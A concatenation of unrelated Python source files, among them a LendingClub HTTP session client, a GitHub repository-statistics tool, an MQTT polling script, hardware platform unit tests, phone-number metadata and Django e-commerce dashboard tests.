try:
response = requests.head(self.base_url)
status = response.status_code
return 200 <= status < 400 # Returns true if the status code is greater than 200 and less than 400
except Exception:
return False
def request(self, method, path, query=None, data=None, redirects=True):
"""
Sends HTTP request to LendingClub.
Parameters
----------
method : {GET, POST, HEAD, DELETE}
The HTTP method to use: GET, POST, HEAD or DELETE
path : string
The path that will be appended to the domain defined in :attr:`base_url`.
query : dict
A dictionary of query string parameters
data : dict
A dictionary of POST data values
redirects : boolean
True to follow redirects, False to return the original response from the server.
Returns
-------
requests.Response
A `requests.Response <http://docs.python-requests.org/en/latest/api/#requests.Response>`_ object
"""
# Check session time
self.__continue_session()
try:
url = self.build_url(path)
method = method.upper()
self.__log('{0} request to: {1}'.format(method, url))
if method == 'POST':
request = self.__session.post(url, params=query, data=data, allow_redirects=redirects)
elif method == 'GET':
request = self.__session.get(url, params=query, data=data, allow_redirects=redirects)
elif method == 'HEAD':
request = self.__session.head(url, params=query, data=data, allow_redirects=redirects)
elif method == 'DELETE':
request = self.__session.delete(url, params=query, data=data, allow_redirects=redirects)
else:
raise SessionError('{0} is not a supported HTTP method'.format(method))
self.last_response = request
self.__log('Status code: {0}'.format(request.status_code))
# Update session time
self.last_request_time = time.time()
except (RequestException, ConnectionError, TooManyRedirects, HTTPError) as e:
raise NetworkError('{0} failed to: {1}'.format(method, url), e)
except Timeout:
raise NetworkError('{0} request timed out: {1}'.format(method, url), e)
return request
def post(self, path, query=None, data=None, redirects=True):
"""
POST request wrapper for :func:`request()`
"""
return self.request('POST', path, query, data, redirects)
def get(self, path, query=None, redirects=True):
"""
GET request wrapper for :func:`request()`
"""
return self.request('GET', path, query, None, redirects)
def head(self, path, query=None, data=None, redirects=True):
"""
HEAD request wrapper for :func:`request()`
"""
return self.request('HEAD', path, query, None, redirects)
def clear_session_order(self):
"""
Clears any existing order in the LendingClub.com user session.
"""
self.get('/portfolio/confirmStartNewPortfolio.action')
def json_success(self, json):
"""
Check the JSON response object for the success flag
Parameters
----------
json : dict
A dictionary representing a JSON object from lendingclub.com
"""
if type(json) is dict and 'result' in json and json['result'] == 'success':
return True
return False
class SessionError(Exception):
"""
Base exception class for :mod:`lendingclub.session`
Parameters
----------
value : string
The error message
origin : Exception
The original exception, if this exception was caused by another.
"""
value = 'Unknown error'
origin = None
def __init__(self, value, origin=None):
self.value = value
self.origin = origin
def __str__(self):
if self.origin is None:
return repr(self.value)
else:
return '{0} (from {1})'.format(repr(self.value), repr(self.origin))
class AuthenticationError(SessionError):
"""
Authentication failed
"""
pass
class NetworkError(SessionError):
"""
An error occurred while making an HTTP request
"""
pass
|
from joblib import Parallel, delayed
from itertools import zip_longest
from collections import Counter
from github import Github
import os, sys, shutil, multiprocessing, json
class DevOracle:
def __init__(self, save_path : str):
self.save_path = save_path
if 'PAT' in os.environ:
self.gh = Github(os.environ.get('PAT'))
else:
self.gh = Github()
def single_repo_stats(self, org_then_slash_then_repo : str):
try:
repo = self.gh.get_repo(org_then_slash_then_repo)
weekly_add_del = repo.get_stats_code_frequency()
weekly_commits = repo.get_stats_participation().all
contributors = repo.get_stats_contributors()
releases = repo.get_releases()
except:
print('Could not find data for ' + org_then_slash_then_repo)
return {}
churn_4w = 0
commits_4w = 0
if weekly_add_del and weekly_commits:
for i in range(1, 5):
try:
# Deletions is negative
churn_4w += (weekly_add_del[-i]._rawData[1] - weekly_add_del[-i]._rawData[2])
commits_4w += weekly_commits[-i]
except:
break
num_contributors = len(contributors) if contributors else 0
stats = {
'churn_4w': churn_4w,
'commits_4w': commits_4w,
'contributors': num_contributors,
'stars': repo.stargazers_count,
'forks': repo.forks_count,
'num_releases': releases.totalCount
}
''' FUTURE USE: dev distribution. FIXME efficient adding of these dicts for org_stats()
contributor_distribution = []
for dev in contributors:
this_dev_churn = 0
for week in dev.weeks:
this_dev_churn += week.a + week.d
this_dev = {
'name': dev.author.login,
'commits': dev.total,
'churn': this_dev_churn
}
contributor_distribution.append(this_dev)
'''
return stats#, contributor_distribution
def org_stats(self, org_name : str):
org_repos = self.make_org_repo_list(org_name)
# GitHub API can hit spam limit
number_of_hyperthreads = multiprocessing.cpu_count()
n_jobs = 2 if number_of_hyperthreads > 2 else number_of_hyperthreads
repo_count_list = Parallel(n_jobs = n_jobs)(delayed(self.single_repo_stats)(repo) for repo in org_repos)
stats_counter = Counter()
for repo_stats in repo_count_list:
stats_counter += Counter(repo_stats)
sc_dict = dict(stats_counter)
max_contributors = 0
# FIXME find an efficient way to count distinct devs. This is a good lower bound number.
for dictionary in repo_count_list:
try:
this_contributors = dictionary['contributors']
except:
this_contributors = 0
max_contributors = this_contributors if this_contributors > max_contributors else max_contributors
# GitHub API only returns up to 100 contributors FIXME FIX THIS ====================================================================================================
sc_dict['contributors'] = max_contributors
sc_dict['num_releases'] = 0 if 'num_releases' not in sc_dict else sc_dict['num_releases']
return sc_dict
def make_org_repo_list(self, org_name : str):
org_repos = []
try:
entity = self.gh.get_organization(org_name)
except:
entity = self.gh.get_user(org_name)
for repo in entity.get_repos():
org_repos.append(repo.name)
org_repos = [org_name + '/{0}'.format(repo) for repo in org_repos]
return org_repos
def get_and_save_full_stats(self, github_org : str):
stats = self.org_stats(github_org)
hist = self.historical_progress(github_org)
path_prefix = self.save_path + '/' + github_org
with open(path_prefix + '_stats.json', 'w') as outfile:
outfile.write(json.dumps(stats))
with open(path_prefix + '_history.json', 'w') as outfile:
outfile.write(json.dumps(hist))
def get_churn_and_commits(self, org_then_slash_then_repo : str):
try:
# For front-end app use, combining this github API call with that for single_repo_stats would be beneficial
repo = self.gh.get_repo(org_then_slash_then_repo)
weekly_commits = repo.get_stats_participation().all
weekly_add_del = repo.get_stats_code_frequency()
weekly_churn = []
if weekly_add_del:
for i in range(len(weekly_add_del)):
# Deletions is negative
weekly_churn.append(weekly_add_del[i]._rawData[1] - weekly_add_del[i]._rawData[2])
stats = {
'weekly_churn': weekly_churn,
'weekly_commits': weekly_commits,
'repo': org_then_slash_then_repo
}
return stats
except Exception as e:
print(e)
stats = {
'weekly_churn': weekly_churn,
'weekly_commits': weekly_commits,
'repo': org_then_slash_then_repo
}
return stats
def historical_progress(self, github_org : str):
org_repos = self.make_org_repo_list(github_org)
# GitHub API can hit spam limit
number_of_hyperthreads = multiprocessing.cpu_count()
n_jobs = 2 if number_of_hyperthreads > 2 else number_of_hyperthreads
repo_count_list = Parallel(n_jobs = n_jobs)(delayed(self.get_churn_and_commits)(repo) for repo in org_repos)
churns = []
commits = []
for repo in repo_count_list:
this_churn = repo['weekly_churn']
this_commits = repo['weekly_commits']
churns.append(this_churn[::-1])
commits.append(this_commits[::-1])
churns = [sum(x) for x in zip_longest(*churns, fillvalue = 0)][::-1]
commits = [sum(x) for x in zip_longest(*commits, fillvalue = 0)][::-1]
#churns = churns[-52:]
#assert len(churns) == len(commits)
weeks_ago = list(range(len(churns)))[::-1]
sc_dict = {
'weekly_churn': churns,
'weekly_commits': commits,
'weeks_ago': weeks_ago
}
return sc_dict
if __name__ == '__main__':
if 'PAT' not in os.environ:
print('This requires a GitHub PAT to do anything interesting.')
print('Usage: python3 dev.py [GITHUB_ORG]]')
sys.exit(1)
if len(sys.argv) != 2 or '/' in sys.argv[1]:
print('Usage: python3 dev.py [GITHUB_ORG]]')
sys.exit(1)
do = DevOracle('./')
do.get_and_save_full_stats(sys.argv[1])
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
####################
import json
import time
import indigo
mqttPlugin = indigo.server.getPlugin("com.flyingdiver.indigoplugin.mqtt")
if mqttPlugin.isEnabled():
props = {
'message_type':"#Test#"
}
while True:
message_data = mqttPlugin.executeAction("fetchQueuedMessage", deviceId=1867973662, props=props, waitUntilDone=True)
if message_data != None:
indigo.server.log("Queue Fetch, version = {}, message_type = {}, topic_parts = {}".format(message_data["version"], message_data["message_type"], message_data["topic_parts"]))
device_data = json.loads(message_data["payload"])
indigo.server.log("Queue Fetch, device_data = {}".format(device_data))
else:
time.sleep(1.0) |
#!/usr/bin/env python
# Author: Costin Constantin <costin.c.constantin@intel.com>
# Copyright (c) 2015 Intel Corporation.
#
# Contributors: Alex Tereschenko <alext.mkrs@gmail.com>
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import mraa as m
import unittest as u
PLATFORM_PINCOUNT = 8
PLATFORM_STD_ADC_RES_BITS = 10
PLATFORM_MAX_ADC_RES_BITS = 12
class PlatformChecks(u.TestCase):
def test_platform_pin_count(self):
self.assertEqual(m.getPinCount(), PLATFORM_PINCOUNT, "Wrong number of pins reported by platform")
def test_adc_std_res(self):
adc_std_res = m.adcSupportedBits()
print("Platform ADC standard resolution is: " + str(adc_std_res) + " bits")
self.assertEqual(adc_std_res, PLATFORM_STD_ADC_RES_BITS, "Wrong ADC standard resolution")
def test_adc_max_res(self):
adc_max_res = m.adcRawBits()
print("Platform ADC max. resolution is: " + str(adc_max_res) + " bits")
self.assertEqual(adc_max_res, PLATFORM_MAX_ADC_RES_BITS, "Wrong ADC max. resolution")
if __name__ == "__main__":
u.main()
|
"""Auto-generated file, do not edit by hand. FO metadata"""
from ..phonemetadata import NumberFormat, PhoneNumberDesc, PhoneMetadata
PHONE_METADATA_FO = PhoneMetadata(id='FO', country_code=298, international_prefix='00',
general_desc=PhoneNumberDesc(national_number_pattern='[2-9]\\d{5}', possible_number_pattern='\\d{6}', possible_length=(6,)),
fixed_line=PhoneNumberDesc(national_number_pattern='(?:20|[3-4]\\d|8[19])\\d{4}', example_number='201234', possible_length=(6,)),
mobile=PhoneNumberDesc(national_number_pattern='(?:[27][1-9]|5\\d)\\d{4}', example_number='211234', possible_length=(6,)),
toll_free=PhoneNumberDesc(national_number_pattern='80[257-9]\\d{3}', possible_number_pattern='\\d{6}', example_number='802123', possible_length=(6,)),
premium_rate=PhoneNumberDesc(national_number_pattern='90(?:[1345][15-7]|2[125-7]|99)\\d{2}', possible_number_pattern='\\d{6}', example_number='901123', possible_length=(6,)),
shared_cost=PhoneNumberDesc(),
personal_number=PhoneNumberDesc(),
voip=PhoneNumberDesc(national_number_pattern='(?:6[0-36]|88)\\d{4}', possible_number_pattern='\\d{6}', example_number='601234', possible_length=(6,)),
pager=PhoneNumberDesc(),
uan=PhoneNumberDesc(),
voicemail=PhoneNumberDesc(),
no_international_dialling=PhoneNumberDesc(),
national_prefix_for_parsing='(10(?:01|[12]0|88))',
number_format=[NumberFormat(pattern='(\\d{6})', format='\\1', domestic_carrier_code_formatting_rule='$CC \\1')])
|
import numpy as np
# using sklearn
from sklearn.neural_network import MLPClassifier
x = [[0., 0.], [1., 1.]]
y = [0, 1]
clf = MLPClassifier(solver='lbfgs', alpha=1e-5, hidden_layer_sizes=(5, 2), random_state=1)
clf.fit(x,y)
print(clf.predict([[2., 2.], [-1., -2.]])) |
from http import client as http_client
import json
from django.conf import settings
from django.contrib.messages import ERROR, INFO
from django.urls import reverse
from django.utils.http import urlencode
from django.utils.translation import gettext
from izi.core.loading import get_class, get_model
from izi.test.factories import (
AttributeOptionFactory, AttributeOptionGroupFactory, CategoryFactory,
PartnerFactory, ProductAttributeFactory, ProductFactory, create_product)
from izi.test.testcases import WebTestCase, add_permissions
Product = get_model('catalogue', 'Product')
ProductClass = get_model('catalogue', 'ProductClass')
ProductCategory = get_model('catalogue', 'ProductCategory')
Category = get_model('catalogue', 'Category')
StockRecord = get_model('partner', 'stockrecord')
AttributeOptionGroup = get_model('catalogue', 'AttributeOptionGroup')
AttributeOption = get_model('catalogue', 'AttributeOption')
AttributeOptionGroupForm = get_class('dashboard.catalogue.forms',
'AttributeOptionGroupForm')
AttributeOptionFormSet = get_class('dashboard.catalogue.formsets',
'AttributeOptionFormSet')
RelatedFieldWidgetWrapper = get_class('dashboard.widgets',
'RelatedFieldWidgetWrapper')
class TestCatalogueViews(WebTestCase):
is_staff = True
def test_exist(self):
urls = [reverse('dashboard:catalogue-product-list'),
reverse('dashboard:catalogue-category-list'),
reverse('dashboard:stock-alert-list')]
for url in urls:
self.assertIsOk(self.get(url))
def test_upc_filter(self):
product1 = create_product(upc='123')
product2 = create_product(upc='12')
product3 = create_product(upc='1')
# no value for upc, all results
page = self.get("%s?upc=" %
reverse('dashboard:catalogue-product-list'))
products_on_page = [row.record for row
in page.context['products'].page.object_list]
self.assertIn(product1, products_on_page)
self.assertIn(product2, products_on_page)
self.assertIn(product3, products_on_page)
# filter by upc, one result
page = self.get("%s?upc=123" %
reverse('dashboard:catalogue-product-list'))
products_on_page = [row.record for row
in page.context['products'].page.object_list]
self.assertIn(product1, products_on_page)
self.assertNotIn(product2, products_on_page)
self.assertNotIn(product3, products_on_page)
# exact match, one result, no multiple
page = self.get("%s?upc=12" %
reverse('dashboard:catalogue-product-list'))
products_on_page = [row.record for row
in page.context['products'].page.object_list]
self.assertNotIn(product1, products_on_page)
self.assertIn(product2, products_on_page)
self.assertNotIn(product3, products_on_page)
# part of the upc, one result
page = self.get("%s?upc=3" %
reverse('dashboard:catalogue-product-list'))
products_on_page = [row.record for row
in page.context['products'].page.object_list]
self.assertIn(product1, products_on_page)
self.assertNotIn(product2, products_on_page)
self.assertNotIn(product3, products_on_page)
# part of the upc, two results
page = self.get("%s?upc=2" %
reverse('dashboard:catalogue-product-list'))
products_on_page = [row.record for row
in page.context['products'].page.object_list]
self.assertIn(product1, products_on_page)
self.assertIn(product2, products_on_page)
self.assertNotIn(product3, products_on_page)
class TestAStaffUser(WebTestCase):
is_staff = True
def setUp(self):
super().setUp()
self.partner = PartnerFactory()
def test_can_create_a_product_without_stockrecord(self):
category = CategoryFactory()
product_class = ProductClass.objects.create(name="Book")
page = self.get(reverse('dashboard:catalogue-product-create',
args=(product_class.slug,)))
form = page.form
form['upc'] = '123456'
form['title'] = 'new product'
form['productcategory_set-0-category'] = category.id
form.submit()
self.assertEqual(Product.objects.count(), 1)
def test_can_create_and_continue_editing_a_product(self):
category = CategoryFactory()
product_class = ProductClass.objects.create(name="Book")
page = self.get(reverse('dashboard:catalogue-product-create',
args=(product_class.slug,)))
form = page.form
form['upc'] = '123456'
form['title'] = 'new product'
form['productcategory_set-0-category'] = category.id
form['stockrecords-0-partner'] = self.partner.id
form['stockrecords-0-partner_sku'] = '14'
form['stockrecords-0-num_in_stock'] = '555'
form['stockrecords-0-price_excl_tax'] = '13.99'
page = form.submit(name='action', value='continue')
self.assertEqual(Product.objects.count(), 1)
product = Product.objects.all()[0]
self.assertEqual(product.stockrecords.all()[0].partner, self.partner)
self.assertRedirects(page, reverse('dashboard:catalogue-product',
kwargs={'pk': product.id}))
def test_can_update_a_product_without_stockrecord(self):
new_title = 'foobar'
category = CategoryFactory()
product = ProductFactory(stockrecords=[])
page = self.get(
reverse('dashboard:catalogue-product',
kwargs={'pk': product.id})
)
form = page.forms[0]
form['productcategory_set-0-category'] = category.id
self.assertNotEqual(form['title'].value, new_title)
form['title'] = new_title
form.submit()
try:
product = Product.objects.get(pk=product.pk)
except Product.DoesNotExist:
pass
else:
self.assertTrue(product.title == new_title)
if product.has_stockrecords:
self.fail('Product has stock records but should not')
def test_can_create_product_with_required_attributes(self):
category = CategoryFactory()
attribute = ProductAttributeFactory(required=True)
product_class = attribute.product_class
page = self.get(reverse('dashboard:catalogue-product-create',
args=(product_class.slug,)))
form = page.form
form['upc'] = '123456'
form['title'] = 'new product'
form['attr_weight'] = '5'
form['productcategory_set-0-category'] = category.id
form.submit()
self.assertEqual(Product.objects.count(), 1)
def test_can_delete_a_standalone_product(self):
product = create_product(partner_users=[self.user])
category = Category.add_root(name='Test Category')
ProductCategory.objects.create(category=category, product=product)
page = self.get(reverse('dashboard:catalogue-product-delete',
args=(product.id,))).form.submit()
self.assertRedirects(page, reverse('dashboard:catalogue-product-list'))
self.assertEqual(Product.objects.count(), 0)
self.assertEqual(StockRecord.objects.count(), 0)
self.assertEqual(Category.objects.count(), 1)
self.assertEqual(ProductCategory.objects.count(), 0)
def test_can_delete_a_parent_product(self):
parent_product = create_product(structure='parent')
create_product(parent=parent_product)
url = reverse(
'dashboard:catalogue-product-delete',
args=(parent_product.id,))
page = self.get(url).form.submit()
self.assertRedirects(page, reverse('dashboard:catalogue-product-list'))
self.assertEqual(Product.objects.count(), 0)
def test_can_delete_a_child_product(self):
parent_product = create_product(structure='parent')
child_product = create_product(parent=parent_product)
url = reverse(
'dashboard:catalogue-product-delete',
args=(child_product.id,))
page = self.get(url).form.submit()
expected_url = reverse(
'dashboard:catalogue-product', kwargs={'pk': parent_product.pk})
self.assertRedirects(page, expected_url)
self.assertEqual(Product.objects.count(), 1)
def test_can_list_her_products(self):
product1 = create_product(partner_users=[self.user, ])
product2 = create_product(partner_name="sneaky", partner_users=[])
page = self.get(reverse('dashboard:catalogue-product-list'))
products_on_page = [row.record for row
in page.context['products'].page.object_list]
self.assertIn(product1, products_on_page)
self.assertIn(product2, products_on_page)
def test_can_create_a_child_product(self):
parent_product = create_product(structure='parent')
url = reverse(
'dashboard:catalogue-product-create-child',
kwargs={'parent_pk': parent_product.pk})
form = self.get(url).form
form.submit()
self.assertEqual(Product.objects.count(), 2)
def test_cant_create_child_product_for_invalid_parents(self):
# Creates a product with stockrecords.
invalid_parent = create_product(partner_users=[self.user])
self.assertFalse(invalid_parent.can_be_parent())
url = reverse(
'dashboard:catalogue-product-create-child',
kwargs={'parent_pk': invalid_parent.pk})
self.assertRedirects(
self.get(url), reverse('dashboard:catalogue-product-list'))
class TestANonStaffUser(TestAStaffUser):
is_staff = False
is_anonymous = False
permissions = ['partner.dashboard_access', ]
def setUp(self):
super().setUp()
add_permissions(self.user, self.permissions)
self.partner.users.add(self.user)
def test_can_list_her_products(self):
product1 = create_product(partner_name="A", partner_users=[self.user])
product2 = create_product(partner_name="B", partner_users=[])
page = self.get(reverse('dashboard:catalogue-product-list'))
products_on_page = [row.record for row
in page.context['products'].page.object_list]
self.assertIn(product1, products_on_page)
self.assertNotIn(product2, products_on_page)
def test_cant_create_a_child_product(self):
parent_product = create_product(structure='parent')
url = reverse(
'dashboard:catalogue-product-create-child',
kwargs={'parent_pk': parent_product.pk})
response = self.get(url, status='*')
self.assertEqual(http_client.FORBIDDEN, response.status_code)
# Tests below can't work because they don't create a stockrecord
def test_can_create_a_product_without_stockrecord(self):
pass
def test_can_update_a_product_without_stockrecord(self):
pass
def test_can_create_product_with_required_attributes(self):
pass
# Tests below can't work because child products aren't supported with the
# permission-based dashboard
def test_can_delete_a_child_product(self):
pass
def test_can_delete_a_parent_product(self):
pass
def test_can_create_a_child_product(self):
pass
def test_cant_create_child_product_for_invalid_parents(self):
pass
class AttributeOptionGroupCreateMixin(object):
def _set_up_display_create_form_vars(self):
self.url_name = 'dashboard:catalogue-attribute-option-group-create'
self.title = gettext("Add a new Attribute Option Group")
def _test_display_create_form_response(self):
response = self.response
self.assertEqual(response.status_code, http_client.OK)
self.assertTemplateUsed(response, 'dashboard/catalogue/attribute_option_group_form.html')
self.assertInContext(response, 'form')
self.assertIsInstance(response.context['form'], AttributeOptionGroupForm)
self.assertTrue(response.context['form'].instance._state.adding)
self.assertInContext(response, 'attribute_option_formset')
self.assertIsInstance(response.context['attribute_option_formset'], AttributeOptionFormSet)
self.assertTrue(response.context['attribute_option_formset'].instance._state.adding)
self.assertInContext(response, 'title')
self.assertEqual(response.context['title'], self.title)
def _set_up_create_vars(self):
self.url_name = 'dashboard:catalogue-attribute-option-group-create'
self.attribute_option_group_name = 'Test Attribute Option Group'
self.attribute_option_option = 'Test Attribute Option'
def _set_up_create_success_vars(self):
self.success_url_name = 'dashboard:catalogue-attribute-option-group-list'
self.success_message = gettext("Attribute Option Group created successfully")
def _test_creation_of_objects(self):
# Test the creation of the attribute option group
self.assertEqual(1, AttributeOptionGroup.objects.all().count())
attribute_option_group = AttributeOptionGroup.objects.first()
self.assertEqual(attribute_option_group.name, self.attribute_option_group_name)
# Test the creation of the attribute option
self.assertEqual(1, AttributeOption.objects.all().count())
attribute_option = AttributeOption.objects.first()
self.assertEqual(attribute_option.group, attribute_option_group)
self.assertEqual(attribute_option.option, self.attribute_option_option)
class AttributeOptionGroupUpdateMixin(object):
def _set_up_display_update_form_vars(self):
url_name = 'dashboard:catalogue-attribute-option-group-update'
self.url = reverse(url_name, kwargs={'pk': self.attribute_option_group.pk})
self.title = gettext("Update Attribute Option Group '%s'") % self.attribute_option_group.name
def _test_display_update_form_response(self):
response = self.response
self.assertEqual(response.status_code, http_client.OK)
self.assertTemplateUsed(response, 'dashboard/catalogue/attribute_option_group_form.html')
self.assertInContext(response, 'form')
self.assertIsInstance(response.context['form'], AttributeOptionGroupForm)
self.assertEqual(response.context['form'].instance, self.attribute_option_group)
self.assertInContext(response, 'attribute_option_formset')
self.assertIsInstance(response.context['attribute_option_formset'], AttributeOptionFormSet)
self.assertEqual(
response.context['attribute_option_formset'].initial_forms[0].instance,
self.attribute_option_group.options.first())
self.assertInContext(response, 'title')
self.assertEqual(response.context['title'], self.title)
def _set_up_update_vars(self):
url_name = 'dashboard:catalogue-attribute-option-group-update'
self.url = reverse(url_name, kwargs={'pk': self.attribute_option_group.pk})
self.attribute_option_group_name = 'Test Attribute Option Group'
self.attribute_option_option = 'Test Attribute Option'
def _set_up_update_success_vars(self):
self.success_url_name = 'dashboard:catalogue-attribute-option-group-list'
self.success_message = gettext("Attribute Option Group updated successfully")
def _test_update_of_objects(self):
# Test the update of the attribute option group
attribute_option_group = AttributeOptionGroup.objects.first()
self.assertEqual(attribute_option_group.name, self.attribute_option_group_name)
# Test the update of the attribute option
self.assertEqual(attribute_option_group.options.first().option, self.attribute_option_option)
class AttributeOptionGroupDeleteMixin(object):
def _set_up_display_delete_form_vars(self):
url_name = 'dashboard:catalogue-attribute-option-group-delete'
self.url = reverse(url_name, kwargs={'pk': self.attribute_option_group.pk})
def _set_up_display_delete_form_allowed_vars(self):
self.title = gettext("Delete Attribute Option Group '%s'") % self.attribute_option_group.name
def _set_up_display_delete_form_disallowed_vars(self):
self.title = gettext("Unable to delete '%s'") % self.attribute_option_group.name
self.error_message = gettext("1 product attributes are still assigned to this attribute option group")
def _test_display_delete_form_response(self):
response = self.response
self.assertEqual(response.status_code, http_client.OK)
self.assertTemplateUsed(response, 'dashboard/catalogue/attribute_option_group_delete.html')
self.assertInContext(response, 'title')
self.assertEqual(response.context['title'], self.title)
def _test_display_delete_disallowed_response(self):
response = self.response
self.assertInContext(response, 'disallow')
self.assertTrue(response.context['disallow'])
messages = list(response.context['messages'])
self.assertEqual(len(messages), 1)
self.assertEqual(messages[0].level, ERROR)
self.assertEqual(messages[0].message, self.error_message)
def _set_up_delete_vars(self):
url_name = 'dashboard:catalogue-attribute-option-group-delete'
self.url = reverse(url_name, kwargs={'pk': self.attribute_option_group.pk})
def _set_up_delete_success_vars(self):
self.success_url_name = 'dashboard:catalogue-attribute-option-group-list'
self.success_message = gettext("Attribute Option Group deleted successfully")
def _test_deletion_of_objects(self):
# Test the deletion of the attribute option group
attribute_option_group_exists = AttributeOptionGroup.objects.exists()
self.assertFalse(attribute_option_group_exists)
# Test the deletion of the attribute option
attribute_option_exists = AttributeOption.objects.exists()
self.assertFalse(attribute_option_exists)
class AttributeOptionGroupPopUpWindowMixin(object):
def _set_up_pop_up_window_vars(self):
self.to_field = AttributeOptionGroup._meta.pk.name
self.is_popup = RelatedFieldWidgetWrapper.IS_POPUP_VALUE
self.to_field_var = RelatedFieldWidgetWrapper.TO_FIELD_VAR
self.is_popup_var = RelatedFieldWidgetWrapper.IS_POPUP_VAR
def _test_display_pop_up_window_response(self):
response = self.response
self.assertInContext(response, 'to_field')
self.assertEqual(response.context['to_field'], self.to_field)
self.assertInContext(response, 'is_popup')
self.assertEqual(response.context['is_popup'], self.is_popup)
self.assertInContext(response, 'to_field_var')
self.assertEqual(response.context['to_field_var'], self.to_field_var)
self.assertInContext(response, 'is_popup_var')
self.assertEqual(response.context['is_popup_var'], self.is_popup_var)
def _test_display_delete_pop_up_window_response(self):
response = self.response
self.assertInContext(response, 'is_popup')
self.assertEqual(response.context['is_popup'], self.is_popup)
self.assertInContext(response, 'is_popup_var')
self.assertEqual(response.context['is_popup_var'], self.is_popup_var)
def _test_pop_up_window_success_response(self):
response = self.response
self.assertEqual(response.status_code, http_client.OK)
self.assertTemplateUsed(response, 'dashboard/widgets/popup_response.html')
self.assertInContext(response, 'popup_response_data')
self.popup_response_data = json.loads(response.context['popup_response_data'])
def _test_create_pop_up_window_success_response(self):
self._test_pop_up_window_success_response()
popup_response_data = self.popup_response_data
self.assertTrue('value' in popup_response_data)
self.assertTrue('obj' in popup_response_data)
self.assertFalse('action' in popup_response_data)
response = self.response
messages = list(response.context['messages'])
self.assertEqual(len(messages), 0)
def _test_update_pop_up_window_success_response(self):
self._test_pop_up_window_success_response()
popup_response_data = self.popup_response_data
self.assertTrue('action' in popup_response_data)
self.assertEqual(popup_response_data['action'], 'change')
self.assertTrue('value' in popup_response_data)
self.assertTrue('obj' in popup_response_data)
self.assertTrue('new_value' in popup_response_data)
response = self.response
messages = list(response.context['messages'])
self.assertEqual(len(messages), 0)
def _test_delete_pop_up_window_success_response(self):
self._test_pop_up_window_success_response()
popup_response_data = self.popup_response_data
self.assertTrue('action' in popup_response_data)
self.assertEqual(popup_response_data['action'], 'delete')
self.assertTrue('value' in popup_response_data)
response = self.response
messages = list(response.context['messages'])
self.assertEqual(len(messages), 0)
class AttributeOptionGroupRegularWindowMixin(object):
def _test_display_regular_window_response(self):
response = self.response
self.assertTrue('to_field' not in response.context)
self.assertTrue('is_popup' not in response.context)
self.assertTrue('to_field_var' not in response.context)
self.assertTrue('is_popup_var' not in response.context)
def _test_regular_window_success_response(self):
response = self.response
self.assertEqual(response.status_code, http_client.FOUND)
self.assertRedirectsTo(response, self.success_url_name)
messages = list(response.follow().context['messages'])
self.assertEqual(len(messages), 1)
self.assertEqual(messages[0].level, INFO)
self.assertEqual(messages[0].message, self.success_message)
class TestAttributeOptionGroupCreateView(AttributeOptionGroupCreateMixin,
AttributeOptionGroupPopUpWindowMixin,
AttributeOptionGroupRegularWindowMixin,
WebTestCase):
is_staff = True
def test_display_create_form_via_popup_window(self):
self._set_up_display_create_form_vars()
self._set_up_pop_up_window_vars()
url = reverse(self.url_name)
params = {
self.to_field_var: self.to_field,
self.is_popup_var: self.is_popup,
}
querystring = urlencode(params)
url = '%s?%s' % (url, querystring)
self.response = self.get(url)
# Test the response
self._test_display_create_form_response()
self._test_display_pop_up_window_response()
def test_display_create_form_via_regular_window(self):
self._set_up_display_create_form_vars()
self.response = self.get(reverse(self.url_name))
# Test the response
self._test_display_create_form_response()
self._test_display_regular_window_response()
def test_create_via_popup_window(self):
self._set_up_create_vars()
self._set_up_pop_up_window_vars()
form = self.get(reverse(self.url_name)).form
form['name'] = self.attribute_option_group_name
form['options-0-option'] = self.attribute_option_option
params = dict(form.submit_fields())
params[self.to_field_var] = self.to_field
params[self.is_popup_var] = self.is_popup
self.response = self.post(reverse(self.url_name), params=params)
# Test the creation of the attribute option group and attribute option
self._test_creation_of_objects()
# Test the response
self._test_create_pop_up_window_success_response()
def test_create_via_regular_window(self):
self._set_up_create_vars()
self._set_up_create_success_vars()
form = self.get(reverse(self.url_name)).form
form['name'] = self.attribute_option_group_name
form['options-0-option'] = self.attribute_option_option
self.response = form.submit()
# Test the creation of the attribute option group and attribute option
self._test_creation_of_objects()
# Test the response
self._test_regular_window_success_response()
class TestAttributeOptionGroupUpdateView(AttributeOptionGroupUpdateMixin,
AttributeOptionGroupPopUpWindowMixin,
AttributeOptionGroupRegularWindowMixin,
WebTestCase):
is_staff = True
def setUp(self):
super().setUp()
self.attribute_option_group = AttributeOptionGroupFactory()
AttributeOptionFactory(group=self.attribute_option_group)
def test_display_update_form_via_popup_window(self):
self._set_up_display_update_form_vars()
self._set_up_pop_up_window_vars()
params = {
self.to_field_var: self.to_field,
self.is_popup_var: self.is_popup,
}
querystring = urlencode(params)
url = '%s?%s' % (self.url, querystring)
self.response = self.get(url)
# Test the response
self._test_display_update_form_response()
self._test_display_pop_up_window_response()
def test_display_update_form_via_regular_window(self):
self._set_up_display_update_form_vars()
self.response = self.get(self.url)
# Test the response
self._test_display_update_form_response()
self._test_display_regular_window_response()
def test_update_via_popup_window(self):
self._set_up_update_vars()
self._set_up_pop_up_window_vars()
form = self.get(self.url).form
form['name'] = self.attribute_option_group_name
form['options-0-option'] = self.attribute_option_option
params = dict(form.submit_fields())
params[self.to_field_var] = self.to_field
params[self.is_popup_var] = self.is_popup
self.response = self.post(self.url, params=params)
# Test the update of the attribute option group and attribute option
self._test_update_of_objects()
# Test the response
self._test_update_pop_up_window_success_response()
def test_update_via_regular_window(self):
self._set_up_update_vars()
self._set_up_update_success_vars()
form = self.get(self.url).form
form['name'] = self.attribute_option_group_name
form['options-0-option'] = self.attribute_option_option
